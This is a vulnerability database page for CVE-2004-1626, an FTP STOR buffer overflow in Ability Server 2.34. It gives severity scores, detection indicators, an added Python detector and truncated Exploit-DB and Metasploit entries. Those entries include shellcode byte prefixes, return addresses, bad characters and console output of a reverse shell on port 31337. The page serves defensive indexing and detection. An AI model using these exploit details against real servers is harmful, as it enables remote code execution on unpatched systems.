CVE-2004-1626
Published 2004-10-22

CVE-2004-1626: Buffer overflow in Ability Server 2.34, and possibly other versions, allows remote attackers to execute arbitrary code via a long STOR command.
Priority: P3 45 · CVSS 2.0: 5 (medium) · Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
Exploit: available · EPSS: 67.39% (99.2th percentile)
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| code-crafters | ability_server | — | — |
| code-crafters | ability_server | — | — |
| code-crafters | ability_server | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e
- bytes: \xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5a
- Detect oversized FTP STOR commands (>966 bytes) sent to port 21, indicative of buffer overflow exploitation against Ability Server 2.34.
- Monitor for FTP STOR commands followed by large payloads containing repeated 0x41 bytes (NOP sled pattern) and shellcode bytes starting with \xd9\xee\xd9\x74.
- Alert on reverse shell callback connections to port 31337 originating from an Ability FTP Server process after an oversized STOR command is received.
- The vulnerability also affects the APPE command in addition to STOR; monitor both commands for oversized payloads.
- Bad characters in the shellcode are 0x00, 0x0a and 0x0d; filter/alert on FTP STOR payloads that avoid these bytes while containing high-entropy binary data.
- The Windows XP SP2 RET address (0x7D17D737) and Windows 2000 Server SP4 RET address (0x7C2FA0F7) used in exploit 588 are version-specific; detection based on exact byte sequences at the overflow offset will vary by target OS/SP.
- The vulnerability has been confirmed on version 2.34 but has also been reported in versions 2.25 and 2.32; other versions may also be affected.
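The indicators listed above can be checked directly against the FTP command channel. The following detector is an added example (not code from any of the sources indexed on this page): it applies the oversized-argument threshold, the 0x41 filler run, the \xd9\xee\xd9\x74 shellcode prefix and the bad-character/entropy heuristic to one raw command line at a time. The threshold values are taken from the guidance above; the sample commands at the bottom are constructed for illustration.

```python
"""Flag FTP STOR/APPE command lines that match the CVE-2004-1626 indicators."""
import math
import re
from collections import Counter
from typing import List

OVERSIZED_ARG_BYTES = 966             # oversized-argument threshold from the guidance above
SHELLCODE_PREFIX = b"\xd9\xee\xd9\x74"  # leading bytes of the published shellcode
BAD_CHARS = (0x00, 0x0a, 0x0d)        # bytes the published exploit has to avoid
FILLER_RUN = b"\x41" * 64             # a long run of 0x41 ("A") padding
ENTROPY_THRESHOLD = 6.0               # bits per byte; real filenames sit well below this


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def analyze_ftp_command(line: bytes) -> List[str]:
    """Return the indicator names that fire on one raw FTP command line."""
    findings: List[str] = []
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    if verb.upper() not in (b"STOR", b"APPE"):
        return findings                 # only these two verbs reach the vulnerable parser
    if len(arg) > OVERSIZED_ARG_BYTES:
        findings.append("oversized_argument")
    if FILLER_RUN in arg:
        findings.append("filler_run_0x41")
    if SHELLCODE_PREFIX in arg:
        findings.append("known_shellcode_prefix")
    # Entropy is measured on the payload with 0x41 padding runs stripped, so the
    # sled does not mask a short shellcode tail.
    tail = re.sub(rb"\x41{8,}", b"", arg)
    is_binary = any(b > 0x7E or (b < 0x20 and b not in BAD_CHARS) for b in tail)
    avoids_bad_chars = not any(b in BAD_CHARS for b in tail)
    if is_binary and avoids_bad_chars and shannon_entropy(tail) >= ENTROPY_THRESHOLD:
        findings.append("high_entropy_binary_without_bad_chars")
    return findings


# Constructed sample traffic (not captured from a real system).
BENIGN = b"STOR quarterly_report.pdf\r\n"
SUSPICIOUS = (b"STOR " + b"A" * 970 + SHELLCODE_PREFIX
              + bytes(b for b in range(1, 256) if b not in BAD_CHARS) + b"\r\n")

if __name__ == "__main__":
    for sample in (BENIGN, SUSPICIOUS):
        print(sample[:16], analyze_ftp_command(sample))
```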
No detection rules found.
Exploit-DB · 2004-11-07 · CVE-2004-1626
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
---
```c
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
```
Exploit-DB · 2004-10-21 · CVE-2004-1626
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
---
```python
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Pur
```
Metasploit
Ability Server 2.34 STOR Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Ability Server 2.34. Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands, which leads to a stack-based buffer overflow. This plugin uses the 'STOR' command. The vulnerability has been confirmed on version 2.34 and has also been reported in versions 2.25 and 2.32. Other versions may also be affected.
No writeups or analysis indexed.
References:
- http://marc.info/?l=bugtraq&m=109850947508816&w=2
- http://secunia.com/advisories/12941
- http://www.kb.cert.org/vuls/id/857846
- http://www.osvdb.org/11030
- http://www.securityfocus.com/bid/11508
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17823